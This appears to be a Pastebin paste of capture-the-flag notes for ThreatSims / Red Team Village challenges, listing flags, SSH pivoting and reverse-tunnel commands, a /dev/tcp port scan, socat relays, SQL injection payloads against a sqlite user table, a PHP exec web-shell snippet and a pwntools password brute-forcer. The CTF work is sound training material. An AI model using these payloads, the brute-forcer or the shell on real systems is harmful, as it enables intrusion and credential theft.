Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /*
- https://lucha-de-zorros.bishopfox.com/
- https://twitter.com/todmephis/status/1402659976867467272
- */
- proxychains ssh level11@167.71.187.239
- 1-> 4202c26842398c1d0772ed9eed195113
- 2-> 943430e07fd566bc96aa05fca3c96e48
- 3-> 2cadca6148093c403d82396252b8c4db
- 4-> 72f6af6b0005adb15fbc91e1b140115f
- 5-> 7b6c2552940f47a27fbd729ae0e2893c
- 6-> 7cb1963d316b9a302cf6c204d35b7302
- 7-> RG8geW91IGV2ZW4gbGlmdCBicm8g
- 8-> bGV0J3MgZmluZCBzb21ldGhpbmcg
- 9-> 96ab15e954f1267ea04c35de2d771c2b
- 10 -> 955830
- 11-> 192
- 12 -> 0982e2a869857644074d06b1a4fd1bea
- 13 -> f4736e1eb28b1d9055c5f5d58a49b5a6
- 14 -> 0ea027e3835aa87a4a47465321c5fe75
- 15 -> 4.19
- 16 -> Debian
- 17 -> 6b39034a8045ed996a436f8d09031522
- 18 -> 9a42b1822710d790a393800f2896a8f7
- 19 -> b06a246b0646b337f319316b9232151c
- 20 -> 5cf82d972614f73422f899f90cfce80f
- 21 -> 65230da2ead4ba2ed76ee2605cadcd4d
- traceeasy -> ts{whydidyouevenrunit}
- tigers -> TS{JoeMadeAllTheseTaligers}
- web recon1 -> TS{CaroleBaskinTotallyDidIt}
- web recon2 -> TS{JeffLoweStoleAllMyTigers}
- CANDY -> TS{PeopleComeToSeeMeNotTheTigers}
- OLD IE BROWSER -> TS{ThisBrowserIsPerferctForWatchingJoeExoticTV}
- admin section -> ' or 1=1 -- > TS{JoeIsGladYouCameToSeeAllHisTigers}
- search tiges -> -1' or 1=1 /* > TS{LookingForTigerIsDarnHard}
- what is joe's password? -> tigers
- clicks ->ts{bufferoverflow}
- /*
- ts buff { ow ov ag } fl er
- ts{bufferoverflag}
- */
- Perime -> ssh tunneler@tunneler.threatsims.com -p 2222 -L 8000:IP:80 -> ts{SSHtoANonStandardPort}
- Access the web -> ts{TheFirstTunnelIsTheEasiest}
- PIVOT -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -> ts{IThoughtWeLostYouOnTheWay}
- PIVOT2 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222,whistler@10.218.176.199:22 crease@10.112.3.12 -> ts{TunnelsInTunnelsInTunnels}
- BEACONS 1 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -R 10.112.3.199:58671:127.0.0.1:5999 -> nc -lvnp 5999 -> ts{GreatFirstReverseTunnel}
- BEACONS 2 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 127.0.0.1:7000:10.112.3.88:7000 -> fast -> nc -lvnp 5555 -> ts{YourTunnelGameisAlright}
- fast(){
- ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -R 10.112.3.199:$1:127.0.0.1:5555;
- }
- Network scan -> for port in {1..65535}; do echo >/dev/tcp/10.112.3.207/$port && echo "port $port is open"; done > test.txt -> ftp 10.112.3.207 53121 -> ts{SocatTunnelsForTheWin}
- SNMP -> pivot2(crease) socat tcp-listen:6666,fork udp4:10.24.13.161:161 -> pivot1 (whistler) proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 6666:10.112.3.12:6666 -> LOCALHOST socat UDP4-LISTEN:161,fork TCP:localhost:6666 -> LOCAL snmpwalk -v1 -c public localhost -> ts{UDPthroughTCPtunnels}
- WEB2 -> pivot2(crease) socat tcp-listen:6666,fork tcp6:[2a02:1b8:b010:9010:1::86]:80 -> proxychains ssh -J tunneler@tunneler.threatsims.com:2222 whistler@10.218.176.199 -L 6666:10.112.3.12:6666 -> curl 127.0.0.1:6666 -> ts{IPv6isNotActuallyNew}
- REPORT1 -> TPS-8352 //XD TPS-31337
- REPORT2 -> TS{GetThemTPSReports}
- TheFlagforthischallengeis:ts{IreallymissThePongs}
- elgoticalnest{ralmsTeog}hFafrhshlegi:sIelyishPnsT
- view-source:http://troll.threatsims.com:4646//lel.php.back
- <?php
- @chdir('/tmp/bf');
- if (isset($_GET['DL2k21']) && strlen($_GET['DL2k21']) <= 8) {
- @exec('echo -n '.base64_decode($_GET['DL2k21']));
- }
- // That was easy! Now you have the code that runs in the server; congratz.
- // Watch out: There's something else, evil, being executed...
- ?>
- 22->643b2616b33de99b179c33950970d519
- -1' or age < 60 /*
- -1' or 1=1 order by 4 /*
- -1' or 1=1 union all select (SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%' limit 1)as t,2,3,4 /*
- -1' or 1=1 union all select (SELECT name FROM sqlite_master WHERE type ='table' AND name NOT LIKE 'sqlite_%' limit 1,2)as t,2,3,4 /*
- -1' or 1=1 union all select (SELECT typeof(password) from user limit 1)as t,2,3,4 /*
- -1' or 1=1 union all select (SELECT password>=25 from user limit 1)as t,2,3,4 /*
- -1' or 1=1 union all select (SELECT password>=25 from user limit 1)as t,2,3,4 /*
- -1' or 1=1 union all select (SELECT sql FROM sqlite_master WHERE name = 'user';)as t,2,3,4 /*
- -1' or 1=1 union all select (SELECT sql FROM sqlite_master WHERE name = 'user' limit 1)as t,2,3,4 /*
- ####ping.py
- from pwn import *
- r = remote("pong.threatsims.com",2345)
- correct="T";
- r.recv()
- r.sendline(correct);
- c=r.recv().decode().replace('\n','').replace('\r','');
- flag=""+c;
- def loop(c):
- correct=r.recv().decode().replace('\n','').replace('\r','');
- r.sendline(correct);
- correct=r.recv().decode().replace('\n','').replace('\r','');
- r.sendline(correct);
- return correct;
- while True:
- c=loop(c);
- flag+=c;
- print(flag);
- #####list1.txt
- Ron
- Livingston
- Ron
- Livingston
- ...
- Peter
- Jennifer
- Aniston
- Jennifer
- Aniston
- ...
- Joanna
- David
- Herman
- David
- Herman
- ...
- Michael
- Bolton
- Ajay
- Naidu
- Ajay
- Naidu
- ...
- Samir
- Diedrich
- Bader
- Diedrich
- Bader
- ...
- Lawrence
- Stephen
- Root
- Stephen
- Root
- ...
- Milton
- Gary
- Cole
- Gary
- Cole
- ...
- Bill
- Lumbergh
- Richard
- Riehle
- Richard
- Riehle
- ...
- Tom
- Smykowski
- Alexandra
- Wentworth
- Alexandra
- Wentworth
- ...
- Anne
- Joe
- Bays
- Joe
- Bays
- ...
- Dom
- Portwood
- John
- C.
- McGinley
- John
- C.
- McGinley
- ...
- Bob
- Slydell
- Paul
- Willson
- Paul
- Willson
- ...
- Bob
- Porter
- Kinna
- McInroe
- Kinna
- McInroe
- ...
- Nina
- Todd
- Duffey
- Todd
- Duffey
- ...
- Chotchkie's
- Waiter
- Greg
- Pitts
- Greg
- Pitts
- ...
- Drew
- Michael
- McShane
- Michael
- McShane
- ...
- Dr.
- Swanson
- (as
- Micheal
- McShane)
- Linda
- Wakeman
- Linda
- Wakeman
- ...
- Laura
- Smykowski
- Jennifer
- Jane
- Emerson
- Jennifer
- Jane
- Emerson
- ...
- Female
- Temp
- Kyle
- Scott
- Jackson
- Kyle
- Scott
- Jackson
- ...
- Rob
- Newhouse
- Orlando
- Jones
- Orlando
- Jones
- ...
- Steve
- Barbara
- George-Reiss
- Barbara
- George-Reiss
- ...
- Lumbergh's
- Secretary
- Tom
- Schuster
- Tom
- Schuster
- ...
- Construction
- Foreman
- Rupert
- Reyes
- Rupert
- Reyes
- ...
- Mexican
- Waiter
- (as
- Ruperto
- Reyes
- Jr.)
- Jackie
- Belvin
- Jackie
- Belvin
- ...
- Swanson's
- Patient
- #1
- Gabriel
- Folse
- Gabriel
- Folse
- ...
- Swanson's
- Patient
- #2
- Jesse
- De
- Luna
- Jesse
- De
- Luna
- ...
- Cop
- at
- Fire
- Mike
- Judge
- Mike
- Judge
- ...
- Chotchkie's
- Manager
- (as
- William
- King)
- Justin
- Possenti
- Justin
- Possenti
- ...
- Spectator
- Jack
- Betts
- Jack
- Betts
- ...
- Judge
- Rest
- of
- cast
- listed
- alphabetically:
- Charissa
- Allen
- Charissa
- Allen
- ...
- Jogger
- (uncredited)
- Josh
- Bond
- Josh
- Bond
- ...
- Initech
- Security
- Guard
- (uncredited)
- Bob
- Crain
- Bob
- Crain
- ...
- Sleepy
- Office
- Worker
- (uncredited)
- Natalie
- Denning
- Natalie
- Denning
- ...
- Initech
- Employee
- (uncredited)
- Gareth
- B.
- DePutron
- Gareth
- B.
- DePutron
- ...
- Office
- Worker
- (uncredited)
- Samantha
- Inoue
- Harte
- Samantha
- Inoue
- Harte
- ...
- Initech
- Employee
- (uncredited)
- R.C.
- Keene
- R.C.
- Keene
- ...
- Rush
- Hour
- Driver
- (uncredited)
- Mark
- Kubiak
- Mark
- Kubiak
- ...
- Initech
- Employee
- (uncredited)
- K.
- Todd
- Lytle
- K.
- Todd
- Lytle
- ...
- Rush
- Hour
- Driver
- (uncredited)
- David
- Sharp
- David
- Sharp
- ...
- Rush
- Hour
- Driver
- (uncredited)
- Fabian
- Watkins
- Fabian
- Watkins
- ...
- Pedestrian
- (uncredited)
- Jared
- B.
- Wells
- Jared
- B.
- Wells
- ...
- Driver
- in
- traffic
- (uncredited)
- Heath
- Young
- Heath
- Young
- ...
- Spectator
- (uncredited)
- Produced
- by
- Mike
- Judge
- ...
- producer
- (uncredited)
- Daniel
- Rappaport
- ...
- producer
- Guy
- Riedel
- ...
- executive
- producer
- Michael
- Rotenberg
- ...
- producerMusic
- by
- John
- Frizzell
- Cinematography
- by
- Tim
- Suhrstedt
- ...
- director
- of
- photographyFilm
- Editing
- by
- David
- Rennie
- Casting
- By
- Nancy
- Klopper
- Production
- Design
- by
- Edward
- T.
- McAvoy
- ...
- (as
- Edward
- McAvoy)Art
- Direction
- by
- Adele
- Plauche
- Set
- Decoration
- by
- Carla
- Curry
- Costume
- Design
- by
- ####report.py
- from pwn import *
- words = open('list1.txt').read().replace('\r','').split('\n')
- r = remote("tps.threatsims.com",5000)
- r.recv()
- r.sendline("1")
- d = r.recv()
- r.sendline("TPS-8352")
- e =r.recv().decode()
- print(e)
- for passwd in words:
- print('[+] Trying : %s' % passwd)
- r.sendline(passwd)
- resp = r.recvline()
- if b'Wrong' in resp:
- r.recvline()
- r.recvline()
- continue
- print(str(resp))
- if not b'Wrong' in resp:
- sys.exit('[+] Found! \n%s' % resp)
- wV8E8u7OmgOS0WldXPoHWJDSaAP/gdRJ
- elgoticalnest{ralmsTeog}
- ts{IreeeallymissThhhePongs}
- elgoticalnest{ralmsTeog}hFafrhshlegi
- elgoticalnest{ralmsTeog}hFafrhshlegi:sIelyishPnsT
- /*
- https://alparslanakyildiz.medium.com/necromancer-ctf-solution-c675a13c8fd8
- http://zarb.org/~gc/html/udp-in-ssh-tunneling.html
- https://book.hacktricks.xyz/tunneling-and-port-forwarding
- https://www.hackingarticles.in/snmp-lab-setup-and-penetration-testing/
- https://book.hacktricks.xyz/pentesting/pentesting-snmp
- https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-programming-challenges.html
- https://www.sqlitetutorial.net/sqlite-tutorial/sqlite-describe-table/
- http://zarb.org/~gc/html/udp-in-ssh-tunneling.html
- https://github.com/hyperreality/ctf-writeups/blob/master/2020-defcon-redteamvillage/README.md
- https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-programming-challenges.html
- https://www.imdb.com/title/tt0151804/fullcredits
- https://www.eventbrite.com/e/defcon-red-team-village-ctf-qualifiers-tickets-111543144548
- https://blog.ikuamike.io/posts/2020/grayhat_red_team_village_ctf_tunneler_writeup/
- https://blog.ikuamike.io/posts/2020/grayhat_red_team_village_ctf_tunneler_writeup/#5-beacons-annoying
- https://rayhan0x01.github.io/ctf/2020/08/08/defcon-redteamvillage-ctf-tunneler-1,2,3,4,5,7,9.html
- */
Add Comment
Please, Sign In to add comment